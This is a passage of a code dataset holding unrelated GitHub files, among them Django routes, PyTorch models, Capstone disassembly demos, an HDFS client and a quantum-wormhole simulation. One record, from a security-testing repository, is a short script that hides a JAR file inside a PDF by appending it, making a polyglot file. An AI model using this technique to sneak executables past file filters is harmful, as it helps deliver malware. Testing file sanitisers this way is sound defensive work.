1\n\n ans = ''.join(str(i) for i in nums)\n return ans\n\n\nn = 2\nfor i in range(n):\n ans = countAndSay(i)\n print(i, ans)\n","repo_name":"24rochak/LeetCode","sub_path":"Count and Say.py","file_name":"Count and Say.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7803938859","text":"from django.urls import path\n\nfrom . import views\nfrom django.conf import settings \nfrom django.conf.urls.static import static \n\n\nurlpatterns = [\n path('', views.intro, name='intro'),\n path('form/article/', views.get_article, name='get_article'),\n path('match/', views.match, name='match'),\n path('match//live_info/',views.info,name='info'),\n # we cant put only intro here..we have to put intro/ \n # path('intro/', views.intro, name='intro'),\n path('match/', views.match_detail, name='match_detail'),\n path('form/player/', views.get_player, name='get_player'),\n path('form/nation/', views.get_nation, name='get_nation'),\n path('form/ball/', views.get_ball, name='get_ball'),\n path('form/schedule/', views.get_sched, name='get_sched'),\n path('Latest_news/', views.index_news, name='index_news'),\n path('search_news', views.search_news, name='search_news'),\n path('player/', views.player_detail, name='player_detail'),\n path('Latest_news//', views.detail, name='detail'),\n path('get_News/', views.get_News, name='get_News'),\n path('get_player_detail/', views.get_player_detail, name='get_player_detail'),\n \n path('player/', views.player , name='player'),\n path('nation/', views.nation , name='nation'),\n # path('', views.news, name='news'),\n \n]+static(settings.MEDIA_URL ,document_root=settings.MEDIA_ROOT)\n\n # path('search', views.search , name='search'),\n # path('index_news/', views.news , name='news'),\n # , \n # path('player//', views.player_detail, name='player_detail'),\n # path('match/', views.match_index , name='match_index')","repo_name":"Shubham866/Django_cricket_website","sub_path":"blogs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34809567088","text":"import torch.nn as nn\n\nfrom graphgallery.nn.layers.pytorch import ChebConv, Sequential, activations\n\n\nclass ChebyNet(nn.Module):\n def __init__(self,\n in_features,\n out_features,\n *,\n hids=[16],\n acts=['relu'],\n dropout=0.5,\n K=2,\n bias=False):\n\n super().__init__()\n conv = []\n conv.append(nn.Dropout(dropout))\n for hid, act in zip(hids, acts):\n conv.append(ChebConv(in_features,\n hid, K=K,\n bias=bias))\n conv.append(activations.get(act))\n conv.append(nn.Dropout(dropout))\n in_features = hid\n conv.append(ChebConv(in_features, out_features, K=K, bias=bias))\n conv = Sequential(*conv)\n\n self.conv = conv\n self.reg_paras = conv[1].parameters()\n self.non_reg_paras = conv[2:].parameters()\n\n def forward(self, x, *adj):\n return self.conv(x, *adj)\n","repo_name":"EdisonLeeeee/GraphGallery","sub_path":"graphgallery/nn/models/pytorch/chebynet.py","file_name":"chebynet.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":450,"dataset":"github-code","pt":"52"} +{"seq_id":"41565840851","text":"import argparse\n\nparser = argparse.ArgumentParser(description='Create a new pdf file containing the pdf file and the jar file.')\nparser.add_argument('pdffile', help='The pdf file to use.')\nparser.add_argument('jarfile', help='The jar file to hide.')\nargs = parser.parse_args()\n\npdf_file = open(args.pdffile, 'rb')\npdf_data = pdf_file.read()\npdf_file.close()\n\njar_file = open(args.jarfile, 'rb')\njar_data = jar_file.read()\njar_file.close()\n\nnew_file = open('new-file-from-pdf-jar.pdf', 'wb')\nnew_file.write(pdf_data)\nnew_file.write(jar_data)\nnew_file.close()","repo_name":"xamQrexii/gw-proxy-serverless","sub_path":"security/polyglot/polyglotpdftojar.py","file_name":"polyglotpdftojar.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"26915939630","text":"try:\n from markdown import markdown\nexcept ImportError:\n markdown = lambda v: v\n\nclass TSFunction(object):\n def __init__(self, name, args):\n self.name = name\n self.args = args\n self.type = ''\n self.desc = ''\n\n self.fields = []\n self.see = []\n\n self.set_name_parts()\n\n self.private = self.infer_private()\n self.deprecated = False\n self.in_class = False\n\n self.mult = False\n self.abstract = False\n self.described_args = False\n\n self.code = None\n self.line = None\n\n def infer_private(self):\n auto = ('onadd', 'onremove')\n return self.basename.startswith('_') or self.basename.lower() in auto\n\n def set_name_parts(self):\n split = self.name.split('::')\n\n self.basename = split[-1]\n self.scopename = split[0] if len(split) == 2 else ''\n\n def format(self):\n keys = ('name', 'basename', 'scopename', 'type', 'mult',\n 'private', 'deprecated', 'in_class', 'described_args',\n 'code', 'line', 'see'\n )\n\n data = {\n 'desc': markdown(self.desc.decode('utf8')),\n 'args': []\n }\n\n for key in keys:\n data[key] = getattr(self, key)\n\n for arg in self.args:\n if hasattr(arg, 'desc'):\n arg['desc'] = markdown(arg['desc'].decode('utf8'))\n\n data['args'].append(arg)\n\n return data\n\nclass TSClass(object):\n def __init__(self, name, args):\n self.name = name\n self.args = args\n self.desc = ''\n\n self.fields = []\n self.see = []\n\n self.private = self.infer_private()\n self.deprecated = False\n self.abstract = False\n self.described_args = False\n\n self.code = None\n self.line = None\n\n self.methods = []\n\n def infer_private(self):\n return self.name.startswith('_')\n\n def add_method(self, function):\n if function.in_class:\n raise ValueError()\n\n function.in_class = True\n self.methods.append(function)\n\n def format(self):\n keys = ('name', 'private', 'deprecated', 'described_args', 'code', 'line', 'see', 'abstract')\n\n data = {\n 'methods': [v.format() for v in self.methods],\n 'desc': markdown(self.desc.decode('utf8')),\n 'args': [],\n 'fields': []\n }\n\n for key in keys:\n data[key] = getattr(self, key)\n\n for arg in self.args:\n if 'desc' in arg:\n arg['desc'] = markdown(arg['desc'].decode('utf8'))\n\n data['args'].append(arg)\n\n for field in self.fields:\n field['desc'] = markdown(field['desc'].decode('utf8'))\n data['fields'].append(field)\n\n return data\n\n @classmethod\n def from_constructor(cls, function):\n ins = cls(function.name, function.args)\n keys = ('desc', 'see', 'private', 'deprecated', 'described_args', 'code', 'line', 'abstract', 'fields')\n\n for key in keys:\n setattr(ins, key, getattr(function, key))\n\n return ins\n","repo_name":"qoh/dokus","sub_path":"dokus/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32191460024","text":"# https://programmers.co.kr/learn/courses/30/lessons/12946?language=python3\n\ndef solution(n):\n answer = []\n \n def hanoi(f,m,t,n,answer):\n if n == 0:\n return\n hanoi(f,t,m,n-1,answer)\n answer.append([f,t])\n hanoi(m,f,t,n-1,answer)\n \n hanoi(1,2,3,n,answer)\n \n return answer","repo_name":"JeongHoLim/practice","sub_path":"programmers/Lv3/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16892130579","text":"import csv\nimport openpyxl\nimport json\nimport requests\nimport xml.etree.ElementTree as Et\nimport PyPDF2\nfrom bs4 import BeautifulSoup\n\n# Working with a CSV file\nprint(csv.list_dialects())\ncsv_rows = []\n\nwith open(\"data.csv\") as csv_file:\n reader = csv.reader(csv_file, delimiter=\";\", quoting=csv.QUOTE_NONE)\n for row in reader:\n csv_rows.append(row)\n price = row[1]\n print(price)\n\nwith open(\"data.csv\", \"a\") as csv_file:\n writer = csv.writer(csv_file, delimiter=\";\")\n row = [\"iPad\", \"900\", \"2\"]\n writer.writerow(row)\n\n# Working with an Excel file\nwb = openpyxl.Workbook()\nws = wb.active\nfor row in csv_rows:\n ws.append(row)\n\nwb.save(\"file.xlsx\")\n\nwb.close()\n\nwb = openpyxl.load_workbook(\"file.xlsx\")\nws = wb.active\nprint(ws[\"A2\"].value)\nwb.close()\n\n# Working with a JSON file\nwith open(\"example.json\", \"r\") as file:\n json_file = json.load(file)\n q1 = json_file[\"quiz\"][\"sport\"][\"q1\"]\n question = q1[\"question\"]\n print(question)\n answer = q1[\"options\"][2]\n print(answer)\n\nwith open(\"result.json\", \"w\") as file:\n object_to_be_written = {\"header\": csv_rows[0]}\n json.dump(object_to_be_written, file)\n\n# Working with an XML file\nxml = Et.parse(\"file.xml\")\nit = xml.getroot().findall(\"country\")\nfor i in it:\n print(i.get(key=\"name\"))\n print(i.find(\"gdppc\").text)\n\n# Working with an HTML file\nresponse = requests.get(\"https://google.com\")\nsoup = BeautifulSoup(response.content, features=\"html.parser\")\nlink_list = soup.find_all(\"a\")\nprint(link_list)\n\n# Working with a PDF file\nwith open(\"file.pdf\", \"rb\") as pdf_file:\n reader = PyPDF2.PdfReader(pdf_file)\n for page in reader.pages:\n print(page.extract_text())\n\n\n\n\n","repo_name":"BogdanIancu/PythonForBeginners","sub_path":"Course16/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33202383551","text":"# file to implement the wormhole protocol using the analytic expression derived in Jafferis and Gao et al\nimport os\nimport numpy as np\nimport scipy\nfrom syk import * # my code implementing their majorana operators and Hamiltonians\n\n# projectors #\nPx_p = (np.eye(2)+Sx)/2\nPx_m = (np.eye(2)-Sx)/2\nPy_p = (np.eye(2)+Sy)/2\nPy_m = (np.eye(2)-Sy)/2\n\n## overview of protocol: ##\n# 1. at time -t', apply SWAP between right qubit in Bell state (Q) and left qubit in TFD state (L)\n# 2. at time 0, apply U = e^{i mu V} to the state\n# 3. at time t, apply SWAP between right qubit of TFD (R) and the final readout qubit T\n\ndef adjoint(state):\n ''' Returns the adjoint of a state vector. For a np.matrix, can use .H'''\n return np.conjugate(state).T\n\ndef is_valid_rho(rho, verbose=True):\n ''' Checks if a density matrix is valid. \n params:\n rho: density matrix to check\n verbose: bool, whether to print out what is wrong with rho\n '''\n tolerance = 1e-17\n # make sure not a 0 matrix\n if np.all(np.isclose(rho, np.zeros((rho.shape[0],rho.shape[1])), rtol=tolerance)):\n if verbose: print('rho is 0 matrix')\n return False\n # check if Hermitian\n if not(np.all(np.isclose(rho,adjoint(rho), rtol=tolerance))):\n if verbose: print(f'rho is not Hermitian')\n return False\n # check if positive semidefinite\n eig_val = np.linalg.eigvals(rho)\n if not(np.all(np.greater_equal(eig_val,np.zeros(len(eig_val))) | np.isclose(eig_val,np.zeros(len(eig_val)), rtol=tolerance))):\n if verbose: print('rho is not positive semidefinite. eigenvalues:', eig_val)\n return False\n # square root of rho must exist\n if np.isnan(rho).any() or np.isinf(rho).any():\n if verbose: \n print('rho has infs or nans')\n print('nan', np.isnan(rho))\n print('inf', np.isinf(rho))\n print(rho)\n return False\n # check if trace 1, within tolerance. can use param rtol to change tolerance\n if not(np.isclose(np.trace(rho), 1, tolerance)):\n if verbose: print('rho trace is not 1', np.trace(rho))\n return False\n return True\n\n# function to return the reduced density matrix for TR given a particular jex for Dirac fermion\ndef get_Uj(j,N,mu):\n # only sum over odd since otherwise projectors won't commute\n if j % 2 == 0:\n j_term = np.kron(Px_p, scipy.linalg.expm(1j*mu*Sz / 2)) + np.kron(Px_m, scipy.linalg.expm(-1j*mu*Sz / 2))\n \n # put inside tensor product\n j = j // 2\n if j > 1:\n for n in range(j-1):\n if n > 0:\n prod = np.kron(prod, np.eye(2))\n else:\n prod = np.eye(2)\n prod = np.kron(prod, np.eye(2))\n # tensor with Y tensor X\n prod = np.kron(prod, j_term)\n else:\n prod = j_term\n # tensor with I tensor I for N - m times\n if j > 0:\n for _ in range(N//2 - j):\n prod = np.kron(prod, np.eye(2))\n prod = np.kron(prod, np.eye(2))\n else:\n for _ in range(N//2 - j - 1):\n prod = np.kron(prod, np.eye(2))\n prod = np.kron(prod, np.eye(2))\n return prod\n else:\n j_term = np.kron(Py_p, scipy.linalg.expm(1j*mu*Sy / 2)) + np.kron(Py_m, scipy.linalg.expm(-1j*mu*Sy / 2))\n\n j = (j + 1) // 2\n # loop to tensor Z tensor X j-1 times\n if j > 1:\n for n in range(j-1):\n if n > 0:\n prod = np.kron(prod, np.eye(2))\n else:\n prod = Sz\n prod = np.kron(prod, np.eye(2))\n # tensor with X tensor X\n prod = np.kron(prod, j_term)\n else:\n prod = j_term\n # tensor with I tensor I for N/2 - j times\n for _ in range(N//2 - j):\n prod = np.kron(prod, np.eye(2))\n prod = np.kron(prod, np.eye(2))\n \n return prod\n \ndef get_U(N, mu=-12):\n '''Returns the unitary operator U = e^{i mu V}'''\n # get the Hamiltonian\n # get the potential operator\n for j in range(0, N, 2):\n if j == 0:\n U = get_Uj(j, N, mu)\n else:\n U += get_Uj(j, N, mu)\n return U\n\ndef get_TFD(H, beta=4):\n '''Returns the density matrix for the thermal state of the Hamiltonian H at inverse temperature beta'''\n print(H)\n \n # get the eigenvalues and eigenvectors of the Hamiltonian\n eig_val, eig_vec = np.linalg.eigh(H)\n print('len eig_val', len(eig_val))\n # print('first 10 eig val', eig_val[:10])\n N = int(np.log2(H.shape[0]))\n # get the partition function\n Z = np.sqrt(np.sum(np.exp(-beta * eig_val/2)**2))\n # get the density matrix\n TFD = np.exp(-beta * eig_val /2) / Z \n print(TFD)\n print(np.linalg.norm(TFD))\n TFD = TFD.reshape(2**N, 1)\n rho_TFD = TFD @ TFD.conj().T\n print('shape', rho_TFD.shape)\n print('is valid rho?', is_valid_rho(rho_TFD))\n return rho_TFD\n\ndef get_rho_TR(t, j_1 = 1, j_2 = 2, N=10, H=None, J2 = 4,beta=4, nt0 = -2.8):\n '''Define the non-trivial correlation functions and combine to get reduced density matrix.\n Params:\n t: time at which to evaluate the reduced density matrix\n j_1: index of the first majorana\n j_2: index of the second majorana\n N: number of qubits\n H: Hamiltonian\n l_r: left or right fermion\n J2: J^2 coupling strength\n beta: inverse temperature\n nt0: negative of initial time; assuming fixed injection time\n '''\n\n if H is None:\n H_ls = get_H(N, J2)\n H = np.array(H_ls[0] + H_ls[1])\n\n TFD = get_TFD(H=H, beta=beta)\n\n # get time evolution operator\n U_nt0 = time_ev(H,-nt0)\n U_t = time_ev(H,t)\n\n U = get_U(N)\n U_dagger = adjoint(U)\n\n # get right fermion\n psi_1_r = U_t @ majorana_right(j_1, N) # time-evolve the right fermion by t\n psi_1_r = psi_1_r.reshape(2**N, 2**N)\n psi_1_r_dagger = adjoint(psi_1_r)\n psi_2_r = U_t @ majorana_right(j_2, N) # time-evolve the right fermion by t\n psi_2_r = psi_2_r.reshape(2**N, 2**N)\n psi_2_r_dagger = adjoint(psi_2_r)\n\n # get left fermion\n psi_1_l = U_nt0 @ majorana_left(j_1, N), # time-evolve the left fermion by -t0\n psi_1_l = np.array(psi_1_l[0])\n psi_1_l = psi_1_l.reshape(2**N, 2**N)\n psi_1_l_dagger = adjoint(psi_1_l)\n psi_2_l = U_nt0 @ majorana_left(j_2, N), # time-evolve the left fermion by -t0\n psi_2_l = np.array(psi_2_l[0])\n psi_2_l = psi_2_l.reshape(2**N, 2**N)\n psi_2_l_dagger = adjoint(psi_2_l)\n\n # get rho_11\n rho_11 = .5 * (1 - np.trace(\n anti_commutator(psi_1_l, commutator(psi_2_l, psi_1_l @ U_dagger @ psi_1_r @ psi_2_r @ U)\n ) @ TFD\n ))\n # get rest of diagonals\n rho_22 = 1 - rho_11\n rho_33 = 1 - rho_11\n rho_44 = 1 - rho_22\n\n # get off diagonal\n rho_14 = .5 * np.trace(\n anti_commutator(psi_1_l, U_dagger @ psi_1_r @ U) @ TFD\n ) - np.trace(\n anti_commutator(psi_2_l, psi_1_l @ U_dagger @ psi_2_r @ U @ psi_1_l) @ TFD\n )\n\n # combine to get density matrix\n rho_TR = .5*np.array([[rho_11, 0, 0, rho_14], [0, rho_22, 0, 0], [0, 0, rho_33, 0], [rho_14.conj(), 0, 0, rho_44]])\n\n print('is rho_TR valid?', is_valid_rho(rho_TR))\n return rho_TR\n\ndef get_rho_TR_old(t, j, N, H=None, J2 = 4,beta=4, nt0 = -2.8):\n '''Define the non-trivial correlation functions and combine to get reduced density matrix.\n Params:\n t: time at which to evaluate the reduced density matrix\n j: index of the Dirac fermion\n N: number of qubits\n H: Hamiltonian\n l_r: left or right fermion\n J2: J^2 coupling strength\n beta: inverse temperature\n nt0: negative of initial time; assuming fixed injection time\n '''\n\n if H is None:\n H = get_H(N, J2)[0]\n H = np.array(H)\n print('H', H)\n\n TFD = get_TFD(H, beta)\n\n # get time evolution operator\n U_nt0 = time_ev(H,-nt0)\n U_t = time_ev(H,t)\n\n chi_l = U_nt0 @ get_dirac_left(j, N), # time-evolve the left fermion by -t0\n chi_l =chi_l[0]\n print('chi_l', chi_l)\n chi_l_dagger = chi_l.conj().T\n chi_r = U_t @ get_dirac_right(j, N) # time-evolve the right fermion by t\n chi_r = chi_r.reshape(2**N, 2**N)\n chi_r_dagger = chi_r.conj().T\n\n U = get_U(N)\n U_dagger = U.conj().T\n\n # chi_l @ chi_l_dagger @ U_dagger @ chi_r @ chi_r_dagger @ U @ chi_l @ chi_l_dagger\n\n print('-------')\n\n print('first expec', np.trace(chi_l @ chi_l_dagger @ U_dagger @ chi_r @ chi_r_dagger @ U @ chi_l @ chi_l_dagger @ TFD))\n\n print('-------')\n\n ## using the direct forms of chi; not sure if this is correct -- (not density matrices!)\n rho_11 = np.trace(chi_l @ chi_l_dagger @ U_dagger @ chi_r @ chi_r_dagger @ U @ chi_l @ chi_l_dagger @ TFD) + np.trace(chi_l_dagger @ U_dagger @ chi_r @ chi_r_dagger @ U @ chi_l @ TFD)\n \n rho_14 = np.trace(chi_l @ U_dagger @ chi_r_dagger @ U @ chi_l @ chi_l_dagger @ TFD) + np.trace(chi_l_dagger @ chi_l @ U_dagger @ chi_r_dagger @ U @ chi_l @ TFD)\n \n rho_22 = np.trace(chi_l @ U_dagger @ chi_r @ chi_r_dagger @ U @ chi_l_dagger @ TFD) + np.trace(chi_l_dagger @ chi_l @ U_dagger @ chi_r @ chi_r_dagger @ U @ chi_l_dagger @ chi_l @ TFD)\n\n rho_23 = np.trace(chi_l @ chi_l_dagger @ U_dagger @ chi_r_dagger @ U @ chi_l_dagger @ TFD) + np.trace(chi_l_dagger @ U_dagger @ chi_r_dagger @ U @ chi_l_dagger @ chi_l @ TFD)\n\n rho_33 = np.trace(chi_l @ chi_l_dagger @ U_dagger @ chi_r_dagger @ chi_r @ U @ chi_l @ chi_l_dagger @ TFD) + np.trace(chi_l_dagger @ U_dagger @ chi_r_dagger @ chi_r @ U @ chi_l @ TFD)\n\n rho_44 = np.trace(chi_l @ U_dagger @ chi_r_dagger @ chi_r @ U @ chi_l_dagger @ TFD) + np.trace(chi_l_dagger @ chi_l @ U_dagger @ chi_r_dagger @ chi_r @ U @ chi_l_dagger @ chi_l @ TFD) \n\n # construct the density matrix\n rho_TR = .5 * np.array([[rho_11, 0, 0, rho_14], [0, rho_22, rho_23, 0], [0, rho_23.conj(), rho_33, 0], [rho_14.conj(), 0, 0, rho_44]])\n\n print('is rho_TR valid?', is_valid_rho(rho_TR))\n return rho_TR\n\ndef S(rho):\n print('rho', rho)\n '''Returns the von Neumann entropy of the density matrix rho'''\n\n # check valid density matrix\n if not(is_valid_rho(rho)):\n raise Exception('rho is not a valid density matrix')\n\n # diagonalize rho\n eig_val, eig_vec = np.linalg.eigh(rho)\n # get the entropy\n return -np.sum(eig_val * np.log2(eig_val, where=eig_val>0))\n\ndef get_IRT(t, j_1=1, j_2=2, N=10, H=None, J2 = 4,beta=4, nt0 = -2.8):\n '''Computes the mutual information of the RT state'''\n rho_TR = get_rho_TR(t=t, j_1=j_1, j_2 = j_2, N=N, H=H, J2 = J2, beta=beta, nt0 = nt0)\n print(rho_TR)\n rho_TR = rho_TR.reshape(2, 2, 2, 2)\n print('reshape', rho_TR)\n rho_T = np.trace(rho_TR, axis1=0, axis2=1)\n rho_R = np.trace(rho_TR, axis1=2, axis2=3)\n return S(rho_T) + S(rho_R) - S(rho_TR)\n\nif __name__ == '__main__':\n H_l = np.load('ham/H_10/H_10_right_20231114-020214.npy', allow_pickle=True)\n H_r = np.load('ham/H_10/H_10_right_20231114-020214.npy', allow_pickle=True)\n H = H_l + H_r\n\n # print(get_IRT(t=1, H=H))\n # get_TFD(H=H)\n print(get_rho_TR(2, H=H))\n \n # print_matrix(time_ev(H_l, 1), N = 10, is_SYK=False, other_name='U(t=1)')\n # print(time_ev(np.kron(Sx, Sx) + np.kron(Sy, Sy) + np.kron(Sz, Sz), 2))\n # print(time_ev(Sx, 1))\n \n\n # print(get_IRT(1, 1, 10, nt0=2, H=H_l))\n # print(np.linalg.eigvals(get_rho_TR(1, 1, 10, nt0=2, H=H)))\n # TFD = is_valid_rho(get_TFD(H))\n # print_matrix(get_TFD(H), N=10, is_SYK=False, other_name='TFD')\n\n\n","repo_name":"oscars47/Math-Thesis","sub_path":"interact_jg.py","file_name":"interact_jg.py","file_ext":"py","file_size_in_byte":11630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13077444445","text":"import argparse\nimport json\nimport os\nimport sys\n\n\nimport common\n\n# Add src/testing/ into sys.path for importing xvfb.\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nimport xvfb\n\n\n# Unfortunately we need to copy these variables from ../test_env.py.\n# Importing it and using its get_sandbox_env breaks test runs on Linux\n# (it seems to unset DISPLAY).\nCHROME_SANDBOX_ENV = 'CHROME_DEVEL_SANDBOX'\nCHROME_SANDBOX_PATH = '/opt/chromium/chrome_sandbox'\n\n\ndef main(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--isolated-script-test-output', type=str,\n required=True)\n parser.add_argument(\n '--isolated-script-test-chartjson-output', type=str,\n required=False)\n parser.add_argument(\n '--isolated-script-test-perf-output', type=str,\n required=False)\n parser.add_argument(\n '--isolated-script-test-filter', type=str,\n required=False)\n\n args = parser.parse_args(argv)\n\n env = os.environ.copy()\n # Assume we want to set up the sandbox environment variables all the\n # time; doing so is harmless on non-Linux platforms and is needed\n # all the time on Linux.\n env[CHROME_SANDBOX_ENV] = CHROME_SANDBOX_PATH\n\n if sys.platform == 'win32':\n exe = os.path.join('.', 'content_shell.exe')\n elif sys.platform == 'darwin':\n exe = os.path.join('.', 'Content Shell.app', 'Contents', 'MacOS',\n 'Content Shell')\n else:\n exe = os.path.join('.', 'content_shell')\n\n with common.temporary_file() as tempfile_path:\n env['CHROME_HEADLESS'] = '1'\n rc = xvfb.run_executable([\n sys.executable,\n os.path.join(common.SRC_DIR, 'content', 'shell', 'tools',\n 'breakpad_integration_test.py'),\n '--verbose',\n '--build-dir', '.',\n '--binary', exe,\n '--json', tempfile_path\n ], env)\n\n with open(tempfile_path) as f:\n failures = json.load(f)\n\n with open(args.isolated_script_test_output, 'w') as fp:\n json.dump({\n 'valid': True,\n 'failures': failures,\n }, fp)\n\n return rc\n\n\ndef main_compile_targets(args):\n json.dump(['content_shell_crash_test'], args.output)\n\n\nif __name__ == '__main__':\n # Conform minimally to the protocol defined by ScriptTest.\n if 'compile_targets' in sys.argv:\n funcs = {\n 'run': None,\n 'compile_targets': main_compile_targets,\n }\n sys.exit(common.run_script(sys.argv[1:], funcs))\n sys.exit(main(sys.argv[1:]))\n","repo_name":"kiwibrowser/src","sub_path":"testing/scripts/content_shell_crash_test.py","file_name":"content_shell_crash_test.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"25058529511","text":"# -*- coding: utf-8 -*-\n\n# @Time : 2020/3/7 18:43\n# @Author : focksor\n# @Email : focksor@outlook.com\nimport os\nfrom hdfs import Client, InsecureClient\n\nif __name__ == '__main__':\n hdfs_ip = \"192.168.146.133\"\n hdfs_version = 3\n hdfs_root = \"~/test\"\n filepath = r\"C:\\Users\\daqige\\PycharmProjects\\newLeetCode\\convert.py\"\n hdfs_addr = \"http://\" + hdfs_ip + \":\" + str(9870 if\n (hdfs_version == 3) else 90070)\n\n client = Client(hdfs_addr)\n\n # print(\"创建文件夹\")\n # client.makedirs(hdfs_root)\n # print(client.list(\"/\"))\n #\n # print(\"上传文件\")\n # client.upload(hdfs_root, filepath)\n # print(client.list(hdfs_root))\n #\n # print(\"修改文件名\")\n # client.rename(hdfs_root + \"/convert.py\", hdfs_root + \"/ubuntu.py\")\n # print(client.list(hdfs_root))\n\n print(\"下载文件\")\n client.download(hdfs_root + \"/ubuntu.py\", \".\")\n print(os.listdir(\".\"))\n\n print(\"删除文件\")\n client.delete(hdfs_root + \"/ubuntu.py\")\n print(client.list(hdfs_root))\n","repo_name":"Gleiphir2769/newLeetCode","sub_path":"hadoop.py","file_name":"hadoop.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17861542104","text":"from capstone import *\nfrom capstone.arm import *\nfrom capstone.arm64 import *\n\n\ndef x86():\n CODE = b\"\\x55\\x48\\x8b\\x05\\xb8\\x13\\x00\\x00\"\n\n md = Cs(CS_ARCH_X86, CS_MODE_64)\n for (address, size, mnemonic, op_str) in md.disasm_lite(CODE, 0x1000):\n print(\"0x%x:\\t%s\\t%s\" % (address, mnemonic, op_str))\n\n\ndef mips():\n CODE = b\"\\x56\\x34\\x21\\x34\\xc2\\x17\\x01\\x00\"\n\n md = Cs(CS_ARCH_MIPS, CS_MODE_MIPS64 + CS_MODE_LITTLE_ENDIAN)\n for i in md.disasm(CODE, 0x1000):\n print(\"%x:\\t%s\\t%s\" % (i.address, i.mnemonic, i.op_str))\n\n\ndef arm():\n CODE = b\"\\xf1\\x02\\x03\\x0e\\x00\\x00\\xa0\\xe3\\x02\\x30\\xc1\\xe7\\x00\\x00\\x53\\xe3\"\n\n md = Cs(CS_ARCH_ARM, CS_MODE_ARM)\n md.detail = True\n\n for i in md.disasm(CODE, 0x1000):\n if i.id in (ARM_INS_BL, ARM_INS_CMP):\n print(\"0x%x:\\t%s\\t%s\" % (i.address, i.mnemonic, i.op_str))\n\n if len(i.regs_read) > 0:\n print(\"\\tImplicit registers read: \"),\n for r in i.regs_read:\n print(\"%s \" % i.reg_name(r)),\n # print()\n\n if len(i.groups) > 0:\n print(\"\\tThis instruction belongs to groups:\"),\n for g in i.groups:\n print(\"%u\" % g),\n # print()\n\n\ndef arm64():\n CODE = b\"\\xe1\\x0b\\x40\\xb9\\x20\\x04\\x81\\xda\\x20\\x08\\x02\\x8b\"\n\n md = Cs(CS_ARCH_ARM64, CS_MODE_ARM)\n md.detail = True\n\n for insn in md.disasm(CODE, 0x38):\n print(\"0x%x:\\t%s\\t%s\" % (insn.address, insn.mnemonic, insn.op_str))\n\n if len(insn.operands) > 0:\n print(\"\\tNumber of operands: %u\" % len(insn.operands))\n c = -1\n for i in insn.operands:\n c += 1\n if i.type == ARM64_OP_REG:\n print(\"\\t\\toperands[%u].type: REG = %s\" % (c, insn.reg_name(i.value.reg)))\n if i.type == ARM64_OP_IMM:\n print(\"\\t\\toperands[%u].type: IMM = 0x%x\" % (c, i.value.imm))\n if i.type == ARM64_OP_CIMM:\n print(\"\\t\\toperands[%u].type: C-IMM = %u\" % (c, i.value.imm))\n if i.type == ARM64_OP_FP:\n print(\"\\t\\toperands[%u].type: FP = %f\" % (c, i.value.fp))\n if i.type == ARM64_OP_MEM:\n print(\"\\t\\toperands[%u].type: MEM\" % c)\n if i.value.mem.base != 0:\n print(\"\\t\\t\\toperands[%u].mem.base: REG = %s\" % (c, insn.reg_name(i.value.mem.base)))\n if i.value.mem.index != 0:\n print(\"\\t\\t\\toperands[%u].mem.index: REG = %s\" % (c, insn.reg_name(i.value.mem.index)))\n if i.value.mem.disp != 0:\n print(\"\\t\\t\\toperands[%u].mem.disp: 0x%x\" % (c, i.value.mem.disp))\n\n if i.shift.type != ARM64_SFT_INVALID and i.shift.value:\n print(\"\\t\\t\\tShift: type = %u, value = %u\" % (i.shift.type, i.shift.value))\n\n if i.ext != ARM64_EXT_INVALID:\n print(\"\\t\\t\\tExt: %u\" % i.ext)\n\n if insn.writeback:\n print(\"\\tWrite-back: True\")\n if not insn.cc in [ARM64_CC_AL, ARM64_CC_INVALID]:\n print(\"\\tCode condition: %u\" % insn.cc)\n if insn.update_flags:\n print(\"\\tUpdate-flags: True\")\n\n\nif __name__ == '__main__':\n x86()\n","repo_name":"saber0x0/BCfuzzer","sub_path":"binop/disasm.py","file_name":"disasm.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36740594254","text":"\"\"\"Make articles image nullable; add missing index\n\nRevision ID: c96a3e4d47aa\nRevises: 425cee5e4912\nCreate Date: 2021-01-06 14:51:21.543302\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"c96a3e4d47aa\"\ndown_revision = \"425cee5e4912\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column(\"articles\", \"image\", existing_type=sa.VARCHAR(), nullable=True)\n op.create_index(op.f(\"ix_articles_id2\"), \"articles\", [\"id\"], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f(\"ix_articles_id2\"), table_name=\"articles\")\n op.alter_column(\"articles\", \"image\", existing_type=sa.VARCHAR(), nullable=False)\n # ### end Alembic commands ###\n","repo_name":"sentinel-hub/digital-twin-of-news","sub_path":"dton-api/app/database/versions/c96a3e4d47aa_make_articles_image_nullable.py","file_name":"c96a3e4d47aa_make_articles_image_nullable.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} 